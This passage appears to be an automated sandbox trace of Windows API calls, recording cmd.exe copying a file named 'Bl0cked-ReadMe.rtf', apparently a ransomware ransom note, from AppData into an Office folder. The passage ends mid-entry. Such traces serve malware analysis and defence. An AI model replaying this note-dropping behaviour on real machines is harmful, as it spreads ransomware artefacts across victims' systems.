= mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22487 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22488 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22489 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 22490 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22491 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 22492 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22493 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22494 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 22495 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 22496 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22497 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 343 os_tid = 0x81c [0162.621] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff5c | out: lpSystemTimeAsFileTime=0x14ff5c*(dwLowDateTime=0x9a4d60c0, dwHighDateTime=0x1d440a9)) [0162.621] GetCurrentProcessId () returned 0xfe8 [0162.621] GetCurrentThreadId () returned 0x81c [0162.621] GetTickCount () returned 0x31479 [0162.621] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff54 | out: lpPerformanceCount=0x14ff54*=21940986948) returned 1 [0162.621] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.621] __set_app_type (_Type=0x1) [0162.621] __p__fmode () returned 0x76b331f4 [0162.622] __p__commode () returned 0x76b331fc 
[0162.622] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.622] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.622] GetCurrentThreadId () returned 0x81c [0162.622] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x81c) returned 0x38 [0162.622] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.622] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.622] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.622] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.622] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14feec | out: phkResult=0x14feec*=0x0) returned 0x2 [0162.623] VirtualQuery (in: lpAddress=0x14ff23, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.623] GetConsoleOutputCP () returned 0x1b5 [0162.623] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.623] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.623] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.624] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.624] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.624] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.624] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.624] GetEnvironmentStringsW () returned 0x2d01b0* [0162.624] FreeEnvironmentStringsW (penv=0x2d01b0) returned 1 [0162.624] GetEnvironmentStringsW () returned 0x2d01b0* [0162.625] FreeEnvironmentStringsW (penv=0x2d01b0) returned 1 [0162.625] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee5c | out: phkResult=0x14ee5c*=0x40) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0xe8, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, 
lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x0, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegCloseKey (hKey=0x40) returned 0x0 [0162.625] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee5c | out: phkResult=0x14ee5c*=0x40) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, 
lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x0, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x9, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x9, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x9, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.626] RegCloseKey (hKey=0x40) returned 0x0 [0162.626] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.626] srand (_Seed=0x5b886384) [0162.626] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"" [0162.626] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"" [0162.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.626] 
GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.626] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.626] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.626] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.626] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.627] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.627] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.627] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.627] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.627] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.627] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.627] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.627] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.627] GetEnvironmentStringsW () returned 0x2d2300* [0162.627] FreeEnvironmentStringsW (penv=0x2d2300) returned 1 [0162.627] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.627] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.627] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.627] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.627] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 
[0162.627] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.627] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.627] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.627] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.627] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.627] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.627] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fc28, lpFilePart=0x14fc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fc24*="Desktop") returned 0x18 [0162.628] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.628] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f9a4 | out: lpFindFileData=0x14f9a4) returned 0x2d0040 [0162.628] FindClose (in: hFindFile=0x2d0040 | out: hFindFile=0x2d0040) returned 1 [0162.628] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f9a4 | out: lpFindFileData=0x14f9a4) returned 0x2d0040 [0162.628] FindClose (in: hFindFile=0x2d0040 | out: hFindFile=0x2d0040) returned 1 [0162.628] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f9a4 | out: lpFindFileData=0x14f9a4) returned 0x2d0040 [0162.628] FindClose (in: hFindFile=0x2d0040 | out: hFindFile=0x2d0040) returned 1 [0162.628] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.628] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.629] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.629] GetEnvironmentStringsW () returned 0x2d2b20* [0162.629] FreeEnvironmentStringsW (penv=0x2d2b20) returned 1 
[0162.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.629] GetConsoleOutputCP () returned 0x1b5 [0162.629] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.630] GetUserDefaultLCID () returned 0x409 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fd68, cchData=128 | out: lpLCData="0") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fd68, cchData=128 | out: lpLCData="0") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fd68, cchData=128 | out: lpLCData="1") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.631] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.632] GetConsoleTitleW (in: lpConsoleTitle=0x2c0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.632] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.632] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.632] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.633] _wcsicmp (_String1="type", _String2=")") returned 75 [0162.633] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0162.633] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0162.633] _wcsicmp (_String1="IF", _String2="type") returned -11 [0162.633] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0162.633] _wcsicmp (_String1="REM", _String2="type") returned -2 [0162.633] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0162.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.638] GetFileType (hFile=0x7) returned 0x2 [0162.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.774] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14fc60 | out: lpMode=0x14fc60) returned 1 [0162.774] _dup (_FileHandle=1) returned 3 [0162.774] _close (_FileHandle=1) returned 0 [0162.775] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0162.775] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x14fc30, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0162.776] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0162.776] GetConsoleTitleW (in: lpConsoleTitle=0x14fa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.777] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0162.777] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0162.777] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0162.777] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0162.777] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.778] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14f5c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f5c4) returned 0x2c0eb0 [0162.778] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0162.778] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0162.778] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0162.778] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e4d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0162.778] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] GetFileType (hFile=0x54) returned 0x1 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e528 | out: lpFileSizeHigh=0x14e528*=0x0) returned 0x1632 [0162.779] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.779] GetFileType (hFile=0x4c) returned 0x1 [0162.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.779] GetFileType (hFile=0x4c) returned 0x1 [0162.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.779] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] GetFileType (hFile=0x4c) returned 0x1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] GetFileType (hFile=0x4c) returned 0x1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] GetFileType (hFile=0x4c) returned 0x1 [0162.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.781] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.782] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: 